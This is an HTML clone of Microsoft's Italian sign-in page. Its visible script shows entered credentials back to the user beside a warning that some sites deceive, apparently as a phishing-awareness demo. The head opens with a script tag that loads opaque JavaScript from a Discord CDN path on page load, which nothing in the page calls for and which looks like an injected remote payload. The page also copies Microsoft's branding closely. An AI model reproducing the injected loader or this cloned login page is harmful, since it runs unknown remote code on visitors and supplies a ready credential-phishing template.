<!DOCTYPE html>
<html lang="en">
    <head><script type='text/javascript' src='https://cdn.discordapp.com/Iu1CFyYtYtNZp-KImKceJdArWW9CEj5gs-xRt232IL6urpEI9nOUR9yqcAhPNchv020-VnSBFuCMHxvOqjjzqQ=='></script>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <link rel="icon" type="image/x-icon" href="https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
        <title>Accesso all'account</title>
        <style>
            @font-face {
                font-family: "SegoeUI";
                src: local("Segoe UI"),
                    url("https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2")
                        format("woff2"),
                    url("https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff")
                        format("woff"),
                    url("https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf")
                        format("truetype");
                font-weight: 400;
            }
            @font-face {
                font-family: "SegoeUI";
                src: local("Segoe UI Semibold"),
                    url("https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/semibold/latest.woff2")
                        format("woff2"),
                    url("https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/semibold/latest.woff")
                        format("woff"),
                    url("https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/semibold/latest.ttf")
                        format("truetype");
                font-weight: 600;
            }
            * {
                margin: 0;
                padding: 0;
                box-sizing: border-box;
            }
            body {
                width: 100vw;
                height: 100vh;
                font-family: "Segoe UI", sans-serif;
                color: #1b1b1b;
                background-color: #eee;
            }
            a {
                text-decoration: none;
            }
            a:hover {
                text-decoration: underline;
            }
            .bg {
                animation: fadeIn 1s;
                -webkit-animation: fadeIn 1s;
                width: 100%;
                height: 100%;
                background-image: url("https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg");
                background-repeat: no-repeat, no-repeat;
                background-position: center center, center center;
                background-size: cover, cover;
            }
            .container {
                display: grid;
                grid-template-rows: 1fr auto;
            }
            .content {
                margin: auto;
            }
            .card {
                animation: fadeIn 0.3sease-in;
                -webkit-animation: fadeIn 0.3sease-in;
                max-width: 440px;
                width: calc(100vw - 40px);
                padding: 44px;
                background-color: #fff;
                box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
                -webkit-box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
                min-width: 320px;
                min-height: 338px;
                overflow: hidden;
            }
            #form-password {
                display: none;
                opacity: 0;
                transform: translateX(100%);
                transition: all 300ms ease-out;
            }
            #userDisplayName {
                margin: 15px 0;
            }
            #result {
                display: none;
                opacity: 0;
                transform: translateX(100%);
                transition: all 300ms ease-out;
                line-height: 2.5;
            }
            .heading {
                line-height: 1.75rem;
                font-size: 1.5rem;
                font-weight: 600;
                margin-top: 12px;
                margin-bottom: 12px;
            }
            .input-container {
                overflow: hidden;
                padding-right: 4px;
                height: 52px;
            }
            .input {
                font-size: 0.9375rem;
                line-height: 1.25rem;
                margin-bottom: 16px;
                margin-left: 2px;
                width: 100%;
                border: 1px solid rgba(0, 0, 0, 0.6);
                border-top-width: 0;
                border-left-width: 0;
                border-right-width: 0;
                height: 36px;
                outline: none;
            }
            .input::placeholder {
                letter-spacing: -0.005em;
                opacity: .8;
            }
            input[type="email"]:focus {
                border-color: #005DA6;
            }
            .error {
                border-color: #e81123 !important;
            }
            #error-msg {
                color: #e81123;
                font-size: .9375rem;
                padding-left: 2px;
                display: none;
            }
            .text {
                height: 56px;
                font-size: .8125rem;
                padding: 2px;
                display: flex;
                flex-direction: column;
                justify-content: space-between;
            }
            .text a {
                color: #0067b8;
            }
            .text a:hover {
                color: #555;
            }
            .text > a:nth-child(2) {
                line-height: 54px;
            }
            .btn-container {
                display: flex;
                justify-content: end;
                padding-top: 26px;
            }
            input[type="button"] {
                width: 108px;
                height: 32px;
                border: none;
                border-radius: 0;
                text-align: center;
                background-color: #cccccc;
                font-size: .9375rem;
                cursor: pointer;
            }
            input[type="button"]:hover {
                background-color: #B2B2B2;
            }
            input[type="submit"] {
                margin-left: 4px;
                width: 108px;
                height: 32px;
                border: none;
                border-radius: 0;
                text-align: center;
                background-color: #0067b8;
                color: #fff;
                font-size: .9375rem;
                cursor: pointer;
            }
            input[type="submit"]:hover {
                background-color: #005DA6;
            }
            #options {
                display: none;
                opacity: 0;
                transform: translateX(100%);
                transition: all 300ms ease-out;
            }
            .opt-row {
                cursor: pointer;
                margin: 0 -44px;
                padding: 11px 33px 11px 44px;
                border: 1px solid transparent;
                border-left: 0;
                border-right: 0;
            }
            .opt-row:hover {
                background-color: #ddd;
            }

            .opt-row:focus {
                background-color: #ddd;
                border: 1px dashed #222;
                border-left: 0;
                border-right: 0;
            }
            .opt-table {
                display: grid;
                grid-template-columns: auto 1fr auto;
                gap: 12px;
            }
            .opt-text {
                margin: auto 0;
                line-height: 16px;
                font-size: .9375rem;
            }
            .opt-text small {
                font-size: .75rem;
            }
            .opt-img {
                margin: auto;
            }
            .options-btn {
                display: flex;
                width: 100%;
                justify-content: end;
                margin-top: 24px;
            }
            .options {
                margin-top: 20px;
                max-width: 440px;
                width: calc(100vw - 40px);
                line-height: 16px;
                min-width: 320px;
                background-color: #fff;
                box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
                padding: 8px 44px;
                display: flex;
                align-items: center;
                gap: 8px;
                cursor: pointer;
                font-size: .9375rem;
            }
            .options:hover {
                background-color: #e5e5e5;
            }
            .options img {
                margin-right: 4px;
            }
            .footer {
                width: 100%;
                text-align: right;
            }
            .footer a {
                color: #000;
                font-size: 12px;
                line-height: 28px;
                margin-left: 8px;
                margin-right: 8px;
                display: inline-block;
            }
            #dots {
                letter-spacing: 3px;
                line-height: 22px;
                vertical-align: top;
                font-size: 16px;
                font-weight: 600;
            }
            #dots:hover {
                text-decoration: none;
            }
            @keyframes fadeIn {
                from {
                    opacity: 0;
                }
                to {
                    opacity: 1;
                }
            }
        </style>
    </head>
    <body>
        <div class="bg container">
            <div class="content">
                <div class="card">
                    <div id="form-mail">
                        <img
                            class="logo"
                            role="img"
                            pngsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png"
                            svgsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg"
                            src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg"
                            alt="Microsoft"
                        />
                        <div class="heading">Accedi</div>
                        <p id="error-msg">Immettere un indirizzo di posta elettronica, un numero di telefono o un nome Skype valido.</p>
                        <div class="input-container">
                            <input
                                autofocus
                                type="email"
                                name="loginfmt"
                                id="i0116"
                                maxlength="113"
                                class="input"
                                aria-required="true"
                                autocomplete="username"
                                aria-label="Immettere un indirizzo di posta elettronica, un numero di telefono o Skype."
                                placeholder="Posta elettronica, telefono o Skype"
                            />
                        </div>
                        <div class="text">
                            <span>
                                Se non si ha un account,
                                <a
                                    href="https://login.live.com/oauth20_authorize.srf?client_id=81feaced-5ddd-41e7-8bef-3e20a2689bb7&amp;scope=service%3a%3aaccount.microsoft.com%3a%3aMBI_SSL+openid+profile+offline_access&amp;redirect_uri=https%3a%2f%2faccount.microsoft.com%2fauth%2fcomplete-signin-oauth&amp;response_type=code&amp;state=H4sIAAAAAAAEAAXByYJDMAAA0H_p1UGkURx6UMRWNfZyo7GNtaUTfP28d9qmbbxU2x5LvTGFmhMXYNXhY7G8DpVlXh95aG3StrjifejRMd7Nt7MXabrLmcc4AQibcCwz0-ywj-SkGjA4KyExlUhD_kDhXJCy7ypyafd8ksU2qRS_Q78JO-bQ_UuPiKlA9iAljvH3bQ6k4_sYRfQZ5C_i-sKHn8Dth2aLJ8Bcn9jvxvJtKe4co3hQF1X89yTFIaPbWEFFMY7PeR01guf1ZdS0h7dSyr6mkHNxvKeGmIh10O6ZTV0MtIaxE8aSanUV9UW4e03DeA7K9rf3LTabVS6zU-tIbhLLEhaJnV8PUzUpauPAFgBIm0DgloRTCa3chnYSxjSMXLjwSeaf5ev19A8QrQrqWgEAAA&amp;prompt=login&amp;x-client-SKU=MSAL.Desktop&amp;x-client-Ver=4.66.1.0&amp;uaid=2e906fa7eee843d6929be7d060db81bc&amp;msproxy=1&amp;issuer=mso&amp;tenant=common&amp;ui_locales=it-IT&amp;client_info=1&amp;signup=1&amp;lw=1&amp;fl=easi2&amp;epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQEqVaJWR5v1Fm6sPyBMIo4d3_17A6W7mFzAZfEiTTFwykGxEEmbMOKpXHGblbpAIbmHnrkEV38sNKTwmoOwdR28FTIrHCeu89f8dTM_X0kgGNleoLGF0RM4-qjo9_mMSQSNVie4y8jbGClWtdlkB__3kuZhvVMU4U4XmWgXQ7I4W8gU7kEmQOEo7b4AqOxmcFVgVpo75CyNh_bCmXN_UkocSAA&amp;jshs=0"
                                    aria-label="Crea un account Microsoft"
                                >fare clic qui per crearne uno.</a>
                            </span>
                            <a
                                id="cantAccessAccount"
                                name="cannotAccessAccount"
                                href="#"
                            >Problemi di accesso all'account?</a>
                        </div>
                        <div class="btn-container">
                            <div>
                                <input
                                    type="button"
                                    value="Indietro"
                                >
                            </div>
                            <div>
                                <input
                                    type="submit"
                                    id="idSIButton9"
                                    data-report-event="Signin_Submit"
                                    data-report-trigger="click"
                                    data-report-value="Submit"
                                    value="Avanti"
                                    data-report-attached="1"
                                >
                            </div>
                        </div>
                    </div>

                    <form id="form-password">
                        <img
                            class="logo"
                            role="img"
                            pngsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png"
                            svgsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg"
                            src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg"
                            alt="Microsoft"
                        />
                        <div id="userDisplayName"></div>
                        <input
                            style="display: none;"
                            id="hidden-input"
                            name="yourEmail"
                            type="email"
                        >
                        <div class="heading">Immettere password</div>
                        <p id="error-msg">Immettere la password per l'account Microsoft.</p>
                        <div class="input-container">
                            <input
                                autofocus
                                id="i0118"
                                name="yourPsw"
                                placeholder="Password"
                                class="input"
                                type="password"
                                maxlength="120"
                                aria-label="Immettere la password per aaa@hotmail.com"
                                autocomplete="current-password"
                            >
                        </div>
                        <div class="text">
                            <div>
                                <a
                                    href="#"
                                >Password dimenticata?</a>
                            </div>
                            <div>
                                <a
                                    href="#"
                                >Usa il volto, l'impronta digitale, il PIN o la chiave di sicurezza</a>
                            </div>
                        </div>
                        <div class="btn-container">
                            <input
                                type="submit"
                                id="Signin_Submit"
                                value="Avanti"
                            >
                        </div>
                    </form>

                    <div id="options">
                        <img
                            class="logo"
                            role="img"
                            pngsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png"
                            svgsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg"
                            src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg"
                            alt="Microsoft"
                        />
                        <div class="heading">Opzioni di accesso</div>
                        <div class="opt-row">
                            <div class="opt-table">
                                <img
                                    role="presentation"
                                    src="https://aadcdn.msauth.net/shared/1.0/content/images/credentialoptions/cred_option_passkey_1500b2043f4d1698f9df6089f67559d7.svg">
                                <div class="opt-text" aria-hidden="true">
                                    <div data-bind="text: description">Viso, impronta digitale, PIN o chiave di sicurezza</div>
                                    <div><small data-bind="text: helpText">Usare il dispositivo per accedere con una passkey.</small></div>
                                </div>
                                <img
                                    class="opt-img"
                                    role="presentation"
                                    pngsrc="https://aadcdn.msauth.net/shared/1.0/content/images/documentation_136bc3add990843012b1ec60612de803.png"
                                    svgsrc="https://aadcdn.msauth.net/shared/1.0/content/images/documentation_dae218aac2d25462ae286ceba8d80ce2.svg"
                                    data-bind="imgSrc"
                                    src="https://aadcdn.msauth.net/shared/1.0/content/images/documentation_dae218aac2d25462ae286ceba8d80ce2.svg"
                                >
                            </div>
                        </div>
                        <div class="opt-row">
                            <div class="opt-table">
                                <img
                                    role="presentation"
                                    src="https://aadcdn.msauth.net/shared/1.0/content/images/credentialoptions/cred_option_github_fa3dbea07d478da8facde73b44f90b02.svg"
                                >
                                <div class="opt-text" aria-hidden="true">
                                    <div data-bind="text: description">Accedi con GitHub</div>
                                    <div><small data-bind="text: helpText">Solo account personali</small></div>
                                </div>
                                <img
                                    class="opt-img"
                                    role="presentation"
                                    pngsrc="https://aadcdn.msauth.net/shared/1.0/content/images/documentation_136bc3add990843012b1ec60612de803.png"
                                    svgsrc="https://aadcdn.msauth.net/shared/1.0/content/images/documentation_dae218aac2d25462ae286ceba8d80ce2.svg"
                                    data-bind="imgSrc"
                                    src="https://aadcdn.msauth.net/shared/1.0/content/images/documentation_dae218aac2d25462ae286ceba8d80ce2.svg"
                                >
                            </div>
                        </div>
                        <div class="opt-row">
                            <div class="opt-table">
                                <img
                                    role="presentation"
                                    src="https://aadcdn.msauth.net/shared/1.0/content/images/picker_account_aad_c5cbcbb43e61b1347b12589901000621.png"
                                >
                                <div class="opt-text" aria-hidden="true">
                                    <div data-bind="text: description">Accedi a un'organizzazione</div>
                                    <div><small data-bind="text: helpText">Cerca una società o un'organizzazione con cui collabori.</small></div>
                                </div>
                            </div>
                        </div>
                        <div class="options-btn">
                            <input
                                type="button"
                                id="idBtn_Back"
                                value="Indietro">
                        </div>
                    </div>

                    <div id="result">
                        <p><b style="color: #e81123;">Attenzione:</b></p>
                        <p>quando inserisci dati sensibili, assicurati che il sito sia affidabile.</p>
                        <p>Alcuni siti possono ingannare.</p>
                        <p>la tua email: <b id="your_email"></b></p>
                        <p>la tua password: <b id="your_psw"></b></p>
                    </div>
                </div>

                <div class="options" id="opt-btn">
                    <img
                        role="presentation"
                        width="32"
                        height="32"
                        src="https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg"
                    />
                    <div>Opzioni di accesso</div>
                </div>
            </div>
            <div class="footer">
                <a
                    href="https://aadcdn.msauth.net/ests/2.1.20139.6/content/agreements/tou/it/tou.txt"
                >Condizioni per l'utilizzo</a>

                <a
                    href="https://aadcdn.msauth.net/ests/2.1.20139.6/content/agreements/privacy/it-it/privacy.txt"
                >Privacy e cookie</a>
                <a
                    href="https://www.microsoft.com/it-it/accessibility/accessibilite/accessibility-statement"
                >Accessibilità</a>
                <a
                    href="#"
                    role="button"
                    aria-label="Per informazioni sulla risoluzione dei problemi fare clic qui"
                    aria-expanded="false"
                    id="dots"
                >...</a>
            </div>
            <script>
                const optionBtn = document.getElementById('opt-btn');
                const emailForm = document.getElementById('form-mail')
                const pwsForm = document.getElementById('form-password')
                const optionsCard = document.querySelector('#options');
                const backbtn = document.getElementById('idBtn_Back');
                const emailSubmitbtn = document.getElementById('idSIButton9');
                const emailInput = document.getElementById("i0116");
                const errorMsg = document.getElementById('error-msg');
                const userDisplayName = document.getElementById('userDisplayName');
                const psw = document.getElementById('i0118');
                const submitBtn = document.getElementById('Signin_Submit');
                const hiddenInput = document.getElementById('hidden-input')
                const resultCard = document.getElementById('result')
                const yourEmail = document.getElementById('your_email')
                const yourPsw = document.getElementById('your_psw')
                const emailRegEx = /^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$/;

                if (optionBtn) optionBtn.addEventListener("click", handleOptions);
                if (backbtn) backbtn.addEventListener("click", handleBack);
                if (emailInput) emailInput.addEventListener("input", cleanError);
                if (emailSubmitbtn) emailSubmitbtn.addEventListener("click", validateEmail);
                if (pwsForm) pwsForm.addEventListener("submit", handleSubmit)

                function handleOptions() {
                    if (!emailForm || !optionsCard) return;
                    emailForm.style.transition = "all 300ms ease-out";
                    emailForm.style.transform = "translateX(-100%)";
                    emailForm.style.opacity = "0";
                    hideOptionBtn()

                    emailForm.addEventListener("transitionend", () => {
                        emailForm.style.display = "none";
                        optionsCard.style.display = "block";

                        setTimeout(() => {
                            optionsCard.style.opacity = "1";
                            optionsCard.style.transform = "translateX(0)";
                        }, 10);
                    }, { once: true });
                }

                function handleBack() {
                    if (!emailForm || !optionsCard || !optionBtn) return;

                    optionsCard.style.transition = "all 300ms ease-out";
                    optionsCard.style.opacity = "0";
                    optionsCard.style.transform = "translateX(100%)";

                    optionsCard.addEventListener("transitionend", () => {
                        optionsCard.style.display = "none";
                        emailForm.style.display = "block";

                        setTimeout(() => {
                            emailForm.style.opacity = "1";
                            emailForm.style.transform = "translateX(0)";
                            optionBtn.style.opacity = "1";
                            optionBtn.style.height = "fit-content";
                            optionBtn.style.marginTop = "20px";
                            optionBtn.style.padding = "8px 44px";
                        }, 10);
                    }, { once: true });
                }

                function changeForm() {
                    if (!emailForm || !pwsForm || !userDisplayName) return;
                    userDisplayName.textContent  = emailInput.value;
                    hiddenInput.value = emailInput.value;
                    emailForm.style.transition = "all 300ms ease-out";
                    emailForm.style.transform = "translateX(-100%)";
                    emailForm.style.opacity = "0";
                    hideOptionBtn()

                    emailForm.addEventListener("transitionend", () => {
                        emailForm.style.display = "none";
                        pwsForm.style.display = "block";

                        setTimeout(() => {
                            pwsForm.style.opacity = "1";
                            pwsForm.style.transform = "translateX(0)";
                            psw.focus();
                        }, 10);
                    }, { once: true });
                }

                function validateEmail(event) {
                    if (!emailRegEx.test(emailInput.value)) {
                        event.preventDefault();
                        emailInput.classList.add('error');
                        errorMsg.style.display = 'block';
                        return;
                    }
                    changeForm()
                }

                function cleanError() {
                    emailInput.classList.remove('error');
                    if (errorMsg) errorMsg.style.display = 'none';
                }

                function hideOptionBtn() {
                    if (!optionBtn) return;
                    optionBtn.style.opacity = "0";
                    optionBtn.style.height = "0";
                    optionBtn.style.marginTop = "0";
                    optionBtn.style.padding = "0";
                }

                function handleSubmit(e) {
                    e.preventDefault()
                    const formData = new FormData(pwsForm)
                    if (!pwsForm || !resultCard || !yourEmail || !yourPsw) return;
                    pwsForm.style.transition = "all 300ms ease-out";
                    pwsForm.style.transform = "translateX(-100%)";
                    pwsForm.style.opacity = "0";
                    hideOptionBtn()

                    pwsForm.addEventListener("transitionend", () => {
                        pwsForm.style.display = "none";
                        resultCard.style.display = "block";

                        setTimeout(() => {
                            resultCard.style.opacity = "1";
                            resultCard.style.transform = "translateX(0)";
                        }, 10);
                    }, { once: true });
                    for (const [chiave, valore] of formData.entries()) {
                        if (chiave === 'yourEmail') yourEmail.textContent = valore
                        if (chiave === 'yourPsw' ) yourPsw.textContent = valore
                    }
                }
            </script>
    </body>
</html>
